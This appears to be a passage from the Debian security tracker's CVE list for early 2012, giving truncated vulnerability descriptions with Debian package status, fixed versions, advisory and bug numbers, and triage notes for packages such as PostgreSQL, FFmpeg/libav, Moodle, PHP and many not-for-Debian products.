CVE-2012-0908 (Cross-site scripting (XSS) vulnerability in logout.php in ...)
	{DSA-2387-1}
	- simplesamlphp 1.8.2-1
	NOTE: http://code.google.com/p/simplesamlphp/issues/detail?id=468
CVE-2012-0884 (The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 ...)
	{DSA-2454-1}
	- openssl 1.0.0h-1 (low)
	NOTE: "If a Linux distribution picks up the fix for CVE-2012-0884 then they will want to pick up change 22161 at the same time" -- http://www.openwall.com/lists/oss-security/2012/03/23/12
CVE-2012-0883 (envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 ...)
	- apache2 (LD_LIBRARY_PATH not set in debian package)
CVE-2012-0882 (Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other ...)
	- mysql-5.5 (bug #675872)
	- cyassl (bug #598391)
	- libyassl (bug #664533)
	NOTE: limited information about the issue, only a video of the exploit taking place
CVE-2012-0881 RESERVED
CVE-2012-0880 RESERVED
CVE-2012-0879 (The I/O implementation for block devices in the Linux kernel before ...)
	{DSA-2469-1}
	- linux-2.6 2.6.33-1
CVE-2012-0878 (Paste Script 1.7.5 and earlier does not properly set group memberships ...)
	- pastescript 1.7.5-2 (low; bug #661061)
	[squeeze] - pastescript (Minor issue)
	NOTE: https://groups.google.com/d/topic/paste-users/KqZRujMcJHE/discussion
CVE-2012-0877 RESERVED
CVE-2012-0876 (The XML parser (xmlparse.c) in expat before 2.1.0 computes hash values ...)
	{DSA-2525-1}
	- expat 2.1.0~beta3-1 (bug #663579)
	- xmlrpc-c 1.16.33-3.2 (low; bug #687672)
	[squeeze] - xmlrpc-c (Minor issue)
	- python2.6 (configured with --with-system-expat since 2.6.6-4)
CVE-2012-0875 [systemtap invalid read leading to kernel DoS]
	RESERVED
	- systemtap 1.7-1 (low; bug #660929; bug #660886)
	[squeeze] - systemtap (Vulnerable code not present)
	[lenny] - systemtap (Vulnerable code not present)
CVE-2012-0874 (The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2012-0873 (Multiple cross-site scripting (XSS) vulnerabilities in Boonex Dolphin ...)
	NOT-FOR-US: Boonex Dolphin
CVE-2012-0872 (Multiple cross-site scripting (XSS) vulnerabilities in OxWall 1.1.1 ...)
	NOT-FOR-US: OxWall
CVE-2012-0871 RESERVED
	- systemd 43-1
CVE-2012-0870 (Heap-based buffer overflow in process.c in smbd in Samba 3.0, as used ...)
	- samba 2:3.4.0~pre1-1
	[lenny] - samba (pre-release issue)
	[squeeze] - samba (pre-release issue)
CVE-2012-0868 (CRLF injection vulnerability in pg_dump in PostgreSQL 8.3.x before ...)
	{DSA-2418-1}
	- postgresql-9.1 9.1.3-1
	- postgresql-8.4 8.4.11-1
CVE-2012-0867 (PostgreSQL 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before ...)
	{DSA-2418-1}
	- postgresql-9.1 9.1.3-1
	- postgresql-8.4 8.4.11-1
CVE-2012-0866 (CREATE TRIGGER in PostgreSQL 8.3.x before 8.3.18, 8.4.x before 8.4.11, ...)
	{DSA-2418-1}
	- postgresql-9.1 9.1.3-1
	- postgresql-8.4 8.4.11-1
CVE-2012-0865 (Multiple open redirect vulnerabilities in CubeCart 3.0.20 and earlier ...)
	NOT-FOR-US: CubeCart
CVE-2012-0864 (Integer overflow in the vfprintf function in stdio-common/vfprintf.c ...)
	- eglibc 2.13-31 (low; bug #660611)
	[squeeze] - eglibc 2.11.3-4
CVE-2012-0863 (Mumble 1.2.3 and earlier uses world-readable permissions for ...)
	{DSA-2411-1}
	- mumble 1.2.3-3 (bug #659039)
CVE-2012-0862 (builtins.c in Xinetd before 2.3.15 does not check the service type ...)
	- xinetd 1:2.3.14-7.1 (bug #672381)
	[squeeze] - xinetd (Minor issue)
CVE-2012-0861 (The vds_installer in Red Hat Enterprise Virtualization Manager ...)
	NOT-FOR-US: Red Hat Enterprise Virtualisation
CVE-2012-0860 (Multiple untrusted search path vulnerabilities in Red Hat Enterprise ...)
	NOT-FOR-US: Red Hat Enterprise Virtualisation
CVE-2012-0859 (The render_line function in the vorbis codec (vorbis.c) in libavcodec ...)
	{DSA-2471-1}
	- libav 6:0.8.3-1
	- ffmpeg
	[squeeze] - ffmpeg 4:0.5.10-1 (bug #688849)
CVE-2012-0858 (The Shorten codec (shorten.c) in libavcodec in FFmpeg 0.7.x before ...)
	{DSA-2624-1}
	- libav 4:0.8.1-1
	[squeeze] - ffmpeg 4:0.5.9-1
CVE-2012-0857 (Multiple buffer overflows in the get_qcx function in the J2K decoder ...)
	- libav (Vulnerable code not present)
	- ffmpeg (Vulnerable code not present)
CVE-2012-0856 (Heap-based buffer overflow in the MPV_frame_start function in ...)
	- libav (Vulnerable code not present)
	- ffmpeg (Vulnerable code not present)
CVE-2012-0855 (Heap-based buffer overflow in the get_sot function in the J2K decoder ...)
	- libav (Vulnerable code not present)
	- ffmpeg (Vulnerable code not present)
CVE-2012-0854 (The dpcm_decode_frame function in libavcodec/dpcm.c in FFmpeg before ...)
	- libav 4:0.8.1-1
	- ffmpeg (Vulnerable code not present)
CVE-2012-0853 (The decodeTonalComponents function in the Actrac3 codec (atrac3.c) in ...)
	{DSA-2471-1}
	- libav 4:0.8.1-1
	- ffmpeg
CVE-2012-0852 (The adpcm_decode_frame function in adpcm.c in libavcodec in FFmpeg ...)
	{DSA-2494-1}
	- libav 4:0.8.1-1
	- ffmpeg
CVE-2012-0851 (The ff_h264_decode_seq_parameter_set function in h264_ps.c in ...)
	{DSA-2494-1}
	- libav 6:0.8.3-1
	- ffmpeg
CVE-2012-0850 (The sbr_qmf_synthesis function in libavcodec/aacsbr.c in FFmpeg before ...)
	- libav 4:0.8.1-1
	- ffmpeg (Vulnerable code not present)
CVE-2012-0849 (Integer overflow in the ff_j2k_dwt_init function in ...)
	- libav (Vulnerable code not present)
	- ffmpeg (Vulnerable code not present)
CVE-2012-0848 (Heap-based buffer overflow in the ws_snd_decode_frame function in ...)
	- libav 4:0.8.1-1
	- ffmpeg (Code in 0.5 not affected per upstream)
CVE-2012-0847 (Heap-based buffer overflow in the avfilter_filter_samples function in ...)
	- libav (Vulnerable code not present)
	- ffmpeg (Vulnerable code not present)
CVE-2012-0846 (Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar ...)
	- webcalendar
CVE-2012-0845 (SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, ...)
	- python3.1 (low)
	[squeeze] - python3.1 (Minor issue)
	- python3.2 3.2.3~rc1-1
	- python2.7 2.7.3~rc1-1
	- python2.6 2.6.8-0.1
	[squeeze] - python2.6 (Minor issue)
	- python2.5
	[squeeze] - python2.5 (Minor issue)
CVE-2012-0844 RESERVED
	- netsurf 2.8-2 (bug #659376)
CVE-2012-0843 RESERVED
	- uzbl 0.0.0~git.20111128-2 (bug #659379)
	[squeeze] - uzbl (Minor issue)
CVE-2012-0842 [surf info leak]
	RESERVED
	- surf 0.4.1-6 (bug #659296)
CVE-2012-0841 (libxml2 before 2.8.0 computes hash values without restricting the ...)
	{DSA-2417-1}
	- libxml2 2.7.8.dfsg-8 (bug #660846)
CVE-2012-0840 (tables/apr_hash.c in the Apache Portable Runtime (APR) library through ...)
	- apr 1.4.6-1 (low; bug #655435)
	[squeeze] - apr (exploitability in httpd extremely limited, not known to be exploitable in svn)
	NOTE: Commit http://mail-archives.apache.org/mod_mbox/apr-commits/201201.mbox/%3C20120115003715.071D423888FD@eris.apache.org%3E seems to cause regressions
CVE-2012-0839 (OCaml 3.12.1 and earlier computes hash values without restricting the ...)
	- ocaml 4.00.0~beta2-1 (low; bug #659149)
	[wheezy] - ocaml (Minor issue)
	[squeeze] - ocaml (Minor issue)
CVE-2012-0838 (Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL ...)
	- libstruts1.2-java (struts 2 issue)
CVE-2012-0837 (Joomla! 1.7.x before 1.7.5 and 2.5.x before 2.5.1 allows attackers to ...)
	- joomla (bug #571794)
CVE-2012-0836 (Unspecified vulnerability in Joomla! 1.7.x before 1.7.5 allows ...)
	- joomla (bug #571794)
CVE-2012-0835 (Unspecified vulnerability in Joomla! 1.7.x before 1.7.5 and 2.5.x ...)
	- joomla (bug #571794)
CVE-2012-0834 (Cross-site scripting (XSS) vulnerability in lib/QueryRender.php in ...)
	- phpldapadmin 1.2.2-1 (bug #658907)
CVE-2012-0833 (The acllas__handle_group_entry function in ...)
	- 389-ds-base (Fixed before initial upload)
CVE-2012-0832 RESERVED
CVE-2012-0831 (PHP before 5.3.10 does not properly perform a temporary change to the ...)
	{DSA-2408-1}
	- php5 5.3.10-1
CVE-2012-0830 (The php_register_variable_ex function in php_variables.c in PHP 5.3.9 ...)
	{DSA-2403-1}
	- php5 5.3.10-1
	NOTE: http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
CVE-2012-0829 (Multiple cross-site request forgery (CSRF) vulnerabilities in Mibew ...)
	NOT-FOR-US: Mibew Messenger
CVE-2012-0828 RESERVED
	- xchat (Only affects Xchat on Windows and Maemo)
CVE-2012-0827 RESERVED
	- drupal7 7.11-1
	- drupal6
CVE-2012-0826 RESERVED
	- drupal7 7.11-1
	- drupal6 6.26-1
CVE-2012-0825 RESERVED
	- drupal7 7.11-1
	- drupal6 6.26-1
CVE-2012-0824 RESERVED
	- gnusound (low; bug #654270)
	[squeeze] - gnusound 0.7.5-3+squeeze1
CVE-2012-0823 (VP8 Codec SDK (libvpx) before 1.0.0 "Duclair" allows remote attackers ...)
	- libvpx 1.0.0-1
	[squeeze] - libvpx (Introduced in 0.9.7)
	NOTE: http://blog.webmproject.org/2012/01/vp8-codec-sdk-duclair-released.html
CVE-2012-0822 (Cross-site scripting (XSS) vulnerability in Joomla! 1.6 and 1.7.x ...)
	- joomla (bug #571794)
CVE-2012-0821 (Unspecified vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 ...)
	- joomla (bug #571794)
CVE-2012-0820 (Cross-site scripting (XSS) vulnerability in Joomla! 1.6.x and 1.7.x ...)
	- joomla (bug #571794)
CVE-2012-0819 (Unspecified vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 ...)
	- joomla (bug #571794)
CVE-2012-0818 (RESTEasy before 2.3.1 allows remote attackers to read arbitrary files ...)
	NOT-FOR-US: RESTEasy framework for JBoss
CVE-2012-0817 (Memory leak in smbd in Samba 3.6.x before 3.6.3 allows remote ...)
	- samba 2:3.6.3-1 (low)
	- samba4 4.0.0~alpha18.dfsg1-1
	[squeeze] - samba (Only affects 3.6.x)
	[lenny] - samba (Only affects 3.6.x)
CVE-2012-0816 RESERVED
CVE-2012-0815 (The headerVerifyInfo function in lib/header.c in RPM before 4.9.1.3 ...)
	- rpm 4.9.1.3-1 (bug #667031)
CVE-2012-0814 (The auth_parse_options function in auth-options.c in sshd in OpenSSH ...)
	- openssh 1:5.6p1-1 (low; bug #657445)
	[squeeze] - openssh 1:5.5p1-6+squeeze2
CVE-2012-0813 (Wicd before 1.7.1 saves sensitive information in log files in ...)
	- wicd 1.7.1~b3-4 (unimportant; bug #652417)
	NOTE: Not a security issue per se, logfile only accessible by root:adm
CVE-2012-0812 [PostfixAdmin 2.3.4 multiple XSS vulnerabilities]
	RESERVED
	- postfixadmin 2.3.5-1
	NOTE: http://seclists.org/oss-sec/2012/q1/285
CVE-2012-0811 [PostfixAdmin 2.3.4 multiple SQL injection vulnerabilities]
	RESERVED
	- postfixadmin 2.3.5-1
	NOTE: http://seclists.org/oss-sec/2012/q1/285
CVE-2012-0810 RESERVED
	- linux-2.6 3.2.16-1 (bug #672660)
	[squeeze] - linux-2.6 (rt patchset not yet present)
	NOTE: Ben Hutchings said it was fixed in 3.2.9-1, I checked it for 3.2.16-1
CVE-2012-0809 (Format string vulnerability in the sudo_debug function in Sudo 1.8.0 ...)
	- sudo 1.8.3p2-1 (bug #657985)
	[squeeze] - sudo (Vulnerable code not present)
	[lenny] - sudo (Vulnerable code not present)
CVE-2012-0808 (as31 2.3.1-4 does not seed the random number generator and generates ...)
	- as31 2.3.1-5 (bug #655496)
	[squeeze] - as31 (The maintainer considers it a minor issue; check the comments in the bug report)
CVE-2012-0807 (Stack-based buffer overflow in the suhosin_encrypt_single_cookie ...)
	- php-suhosin 0.9.33-1 (low; bug #657190)
	[squeeze] - php-suhosin (Exploitable in rare setups)
	NOTE: https://github.com/stefanesser/suhosin/commit/73b1968ee30f6d9d2dae497544b910e68e114bfa
CVE-2012-0806 (Buffer overflow in Bip 0.8.8 and earlier might allow remote ...)
	{DSA-2393-1}
	- bip 0.8.8-2 (bug #657217)
	[lenny] - bip (Maintainer reports vulnerable code not present)
CVE-2012-0805 (Multiple SQL injection vulnerabilities in SQLAlchemy before 0.7.0b4, ...)
	{DSA-2449-1}
	- sqlalchemy 0.6.7-1
CVE-2012-0804 (Heap-based buffer overflow in the proxy_connect function in ...)
	{DSA-2407-1}
	- cvs 2:1.12.13+real-7
CVE-2012-0803 RESERVED
	NOT-FOR-US: Apache CXF
CVE-2012-0802 (Multiple buffer overflows in Spamdyke before 4.3.0 might allow remote ...)
	NOT-FOR-US: spamdyke
CVE-2012-0801 (lib/formslib.php in Moodle 2.1.x before 2.1.4 and 2.2.x before 2.2.1 ...)
	- moodle (Only affects 2.x)
CVE-2012-0800 (The form-autocompletion functionality in Moodle 2.0.x before 2.0.7, ...)
	- moodle (Only affects 2.x)
CVE-2012-0799 (Moodle 2.0.x before 2.0.7 and 2.1.x before 2.1.4, when an anonymous ...)
	- moodle (Only affects 2.x)
CVE-2012-0798 (The self-enrolment functionality in Moodle 2.1.x before 2.1.4 and ...)
	- moodle (Only affects 2.x)
CVE-2012-0797 (The webservices functionality in Moodle 2.0.x before 2.0.7, 2.1.x ...)
	- moodle (Only affects 2.x)
CVE-2012-0796 (class.phpmailer.php in the PHPMailer library, as used in Moodle 1.9.x ...)
	{DSA-2421-1}
	- moodle 1.9.9.dfsg2-5
CVE-2012-0795 (Moodle 1.9.x before 1.9.16, 2.0.x before 2.0.7, 2.1.x before 2.1.4, ...)
	{DSA-2421-1}
	- moodle 1.9.9.dfsg2-5
CVE-2012-0794 (The rc4encrypt function in lib/moodlelib.php in Moodle 1.9.x before ...)
	{DSA-2421-1}
	- moodle 1.9.9.dfsg2-5
CVE-2012-0793 (Moodle 1.9.x before 1.9.16, 2.0.x before 2.0.7, 2.1.x before 2.1.4, ...)
	{DSA-2421-1}
	- moodle 1.9.9.dfsg2-5
CVE-2012-0792 (mod/forum/user.php in Moodle 1.9.x before 1.9.16 allows remote ...)
	{DSA-2421-1}
	- moodle 1.9.9.dfsg2-5
CVE-2012-0791 (Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP ...)
	{DSA-2485-1}
	- imp4 4.3.10+debian0-1.1 (bug #659392)
CVE-2012-0790 (Cross-site scripting (XSS) vulnerability in smokeping_cgi in Smokeping ...)
	{DSA-2651-1}
	- smokeping 2.6.8-2 (bug #659899)
CVE-2012-0789 (Memory leak in the timezone functionality in PHP before 5.3.9 allows ...)
	- php5 5.3.9-1 (low)
	[squeeze] - php5 (Too intrusive to backport)
CVE-2012-0788 (The PDORow implementation in PHP before 5.3.9 does not properly ...)
	{DSA-2408-1}
	- php5 5.3.9-1
CVE-2012-0787 RESERVED
CVE-2012-0786 RESERVED
CVE-2012-0885 (chan_sip.c in Asterisk Open Source 1.8.x before 1.8.8.2 and 10.x ...)
	- asterisk 1:1.8.8.2~dfsg-1 (bug #656596)
	[squeeze] - asterisk (Vulnerable code not present)
	[lenny] - asterisk (Vulnerable code not present)
	NOTE: AST-2012-001 http://downloads.asterisk.org/pub/security/AST-2012-001.html
CVE-2012-0784 RESERVED
CVE-2012-0783 RESERVED
CVE-2012-0782 (** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in ...)
	- wordpress (unimportant)
	NOTE: https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
CVE-2012-0781 (The tidy_diagnose function in PHP 5.3.8 might allow remote attackers ...)
	{DSA-2408-1}
	- php5 5.3.9-1 (low)
CVE-2012-0780 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...)
	NOT-FOR-US: Adobe Illustrator
CVE-2012-0779 (Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0778 (Buffer overflow in Adobe Flash Professional before CS6 allows ...)
	NOT-FOR-US: Adobe Flash Professional
CVE-2012-0777 (The JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.1 and ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-0776 (The installer in Adobe Reader 9.x before 9.5.1 and 10.x before 10.1.3 ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-0775 (The JavaScript implementation in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-0774 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.1 and 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-0773 (The NetStream class in Adobe Flash Player before 10.3.183.18 and 11.x ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0772 (An unspecified ActiveX control in Adobe Flash Player before ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0771 RESERVED
CVE-2012-0770 (Adobe ColdFusion 8.0, 8.0.1, 9.0, and 9.0.1 computes hash values for ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2012-0769 (Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0768 (The Matrix3D component in Adobe Flash Player before 10.3.183.16 and ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0767 (Cross-site scripting (XSS) vulnerability in Adobe Flash Player before ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0766 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0765 (Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp ...)
	NOT-FOR-US: Adobe RoboHelp
CVE-2012-0764 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0763 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0762 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0761 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0760 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0759 (Adobe Shockwave Player before 11.6.4.634 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0758 (Heap-based buffer overflow in Adobe Shockwave Player before 11.6.4.634 ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0757 (The Shockwave 3D Asset component in Adobe Shockwave Player before ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-0756 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0755 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0754 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0753 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0752 (Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0751 (The ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0750 RESERVED
CVE-2012-0749 RESERVED
CVE-2012-0748 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: IBM Rational Team Concert
CVE-2012-0747 (SQL injection vulnerability in IBM Maximo Asset Management 6.2 through ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-0746 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-0745 (The getpwnam function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.1.0.10 ...)
	NOT-FOR-US: IBM AIX
CVE-2012-0744 (IBM Rational ClearQuest 7.1.x through 7.1.2.7 and 8.x through 8.0.0.3 ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-0743 (IBM Tivoli Directory Server (TDS) 6.3 and earlier allows remote ...)
	NOT-FOR-US: IBM Tivoli Directory Server
CVE-2012-0742 (IBM Tivoli Event Pump 4.2.2, when the LOG_REQUESTS and ...)
	NOT-FOR-US: IBM Tivoli Event Pump
CVE-2012-0741 (IBM Security AppScan Enterprise before 8.6.0.2 and Rational Policy ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2012-0740 (Cross-site scripting (XSS) vulnerability in the Web Admin Tool in IBM ...)
	NOT-FOR-US: IBM Tivoli Directory Server
CVE-2012-0739 RESERVED
CVE-2012-0738 (IBM Security AppScan Enterprise before 8.6.0.2 and Rational Policy ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2012-0737 (Cross-site scripting (XSS) vulnerability in IBM Rational AppScan ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0736 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0735 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0734 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0733 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1, when ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0732 (The Enterprise Console client in IBM Rational AppScan Enterprise 5.x ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0731 (IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0730 (Multiple cross-site request forgery (CSRF) vulnerabilities in IBM ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0729 (Unrestricted file upload vulnerability in IBM Rational AppScan ...)
	NOT-FOR-US: IBM Rational AppScan
CVE-2012-0728 (SQL injection vulnerability in IBM Maximo Asset Management 7.1 through ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-0727 (SQL injection vulnerability in IBM Maximo Asset Management 7.5, as ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-0726 (The default configuration of TLS in IBM Tivoli Directory Server (TDS) ...)
	NOT-FOR-US: IBM Tivoli Directory Server
CVE-2012-0725 (Adobe Flash Player before 11.2.202.229 in Google Chrome before ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0724 (Adobe Flash Player before 11.2.202.229 in Google Chrome before ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2012-0723 (The kernel in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, ...)
	NOT-FOR-US: IBM AIX, VIOS
CVE-2012-0721 RESERVED
CVE-2012-0720 (Cross-site scripting (XSS) vulnerability in the Integration Solution ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-0719 (Cross-site scripting (XSS) vulnerability in IBM Tivoli Endpoint ...)
	NOT-FOR-US: IBM Tivoli Endpoint Manager
CVE-2012-0718 RESERVED
CVE-2012-0717 (IBM WebSphere Application Server 7.0 before 7.0.0.23, when a certain ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-0716 (Cross-site scripting (XSS) vulnerability in the Administration Console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-0715 (Cross-site scripting (XSS) vulnerability in the Gantt applet viewer in ...)
	NOT-FOR-US: IBM Tivoli Change and Configuration Management Database
CVE-2012-0714 (Cross-site request forgery (CSRF) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-0713 (Unspecified vulnerability in the XML feature in IBM DB2 9.7 before FP6 ...)
	NOT-FOR-US: IBM DB2
CVE-2012-0712 (The XML feature in IBM DB2 9.5 before FP9, 9.7 through FP5, and 9.8 ...)
	NOT-FOR-US: IBM DB2
CVE-2012-0711 (Integer signedness error in the db2dasrrm process in the DB2 ...)
	NOT-FOR-US: IBM DB2
CVE-2012-0710 (IBM DB2 9.1 before FP11, 9.5 before FP9, 9.7 before FP5, and 9.8 ...)
	NOT-FOR-US: IBM DB2
CVE-2012-0709 (IBM DB2 9.5 before FP9, 9.7 through FP5, and 9.8 through FP4 does not ...)
	NOT-FOR-US: IBM DB2
CVE-2012-0708 (Heap-based buffer overflow in the Ole API in the CQOle ActiveX control ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-0707 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Lombardi ...)
	NOT-FOR-US: IBM WebSphere
CVE-2012-0706 (IBM Scale Out Network Attached Storage (SONAS) 1.3 before 1.3.2.3 ...)
	NOT-FOR-US: IBM Scale Out Network Attached Storage (SONAS)
CVE-2012-0705 (InfoSphere Import Export Manager in InfoSphere Information Server ...)
	NOT-FOR-US: InfoSphere Information Server
CVE-2012-0704 RESERVED
CVE-2012-0703 (Open redirect vulnerability in Information Services Framework (ISF) in ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2012-0702 (Information Services Framework (ISF) in IBM InfoSphere Information ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2012-0701 (The client applications in the DataStage Administrator client in ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2012-0700 (The client in InfoSphere FastTrack 8.1 through 8.7 in IBM InfoSphere ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2012-0699 RESERVED
CVE-2012-0698 (tcsd in TrouSerS before 0.3.10 allows remote attackers to cause a ...)
	{DSA-2576-1}
	- trousers 0.3.9-1 (low; bug #692649)
CVE-2011-5066 (The SibRaRecoverableSiXaResource class in the Default Messaging ...)
	NOT-FOR-US: WebSphere
CVE-2011-5065 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...)
	NOT-FOR-US: WebSphere
CVE-2011-5064 (DigestAuthenticator.java in the HTTP Digest Access Authentication ...)
	{DSA-2401-1}
	- tomcat6 6.0.32-7
	- tomcat7 7.0.12
	- tomcat5.5
CVE-2011-5063 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...)
	{DSA-2401-1}
	- tomcat6 6.0.32-7
	- tomcat7 7.0.12
	- tomcat5.5
CVE-2011-5062 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...)
	{DSA-2401-1}
	- tomcat6 6.0.32-7
	- tomcat7 7.0.12
	- tomcat5.5
CVE-2011-5061 (functions.php in WHMCompleteSolution (WHMCS) 4.0.x through 5.0.x ...)
	NOT-FOR-US: WHMCompleteSolution
CVE-2011-5060 (The par_mktmpdir function in the PAR module before 1.003 for Perl ...)
	- libpar-perl 1.005-1 (bug #650707)
	[squeeze] - libpar-perl 1.000-1+squeeze1
CVE-2010-5082 (Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in ...)
	NOT-FOR-US: Windows Server
CVE-2010-XXXX [webkit info disclosure/segfault]
	- chromium-browser
CVE-2012-0697 (HP StorageWorks P2000 G3 MSA array systems have a default account, ...)
	NOT-FOR-US: HP StorageWorks
CVE-2012-0696 (Multiple cross-site scripting (XSS) vulnerabilities in the Executive ...)
	NOT-FOR-US: IBM Cognos
CVE-2012-0695 (Multiple unspecified vulnerabilities in Google Chrome before ...)
	NOT-FOR-US: Google Chrome books
CVE-2012-0694 [SugarCRM CE unserialize PHP code execution in multiple files]
	RESERVED
	- sugarcrm-ce-5.0 (bug #457876)
	NOTE: http://seclists.org/bugtraq/2012/Jun/165
CVE-2012-0693 (** DISPUTED ** submitticket.php in WHMCompleteSolution (WHMCS) 5.03 ...)
	NOT-FOR-US: WHMCompleteSolution
CVE-2012-0692 (CA License (aka CA Licensing) before 1.90.03 allows local users to ...)
	NOT-FOR-US: CA License
CVE-2012-0691 (CA License (aka CA Licensing) before 1.90.03 does not properly ...)
	NOT-FOR-US: CA License
CVE-2012-0690 (TIBCO Spotfire Web Application, Web Player Application, Automation ...)
	NOT-FOR-US: TIBCO Spotfire
CVE-2012-0689 (The server in TIBCO ActiveMatrix Platform in TIBCO Silver Fabric ...)
	NOT-FOR-US: TIBCO ActiveMatrix
CVE-2012-0688 (Cross-site scripting (XSS) vulnerability in TIBCO ActiveMatrix ...)
	NOT-FOR-US: TIBCO ActiveMatrix
CVE-2012-0687 (TIBCO ActiveMatrix Runtime Platform in Service Grid and Service Bus ...)
	NOT-FOR-US: TIBCO ActiveMatrix
CVE-2012-0686 RESERVED
CVE-2012-0685 (Integer overflow in XnViewer (aka XnView) before 1.98.5 allows remote ...)
	NOT-FOR-US: XnView
CVE-2012-0684 (Integer overflow in XnViewer (aka XnView) before 1.98.5 allows remote ...)
	NOT-FOR-US: XnView
CVE-2012-0683 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix
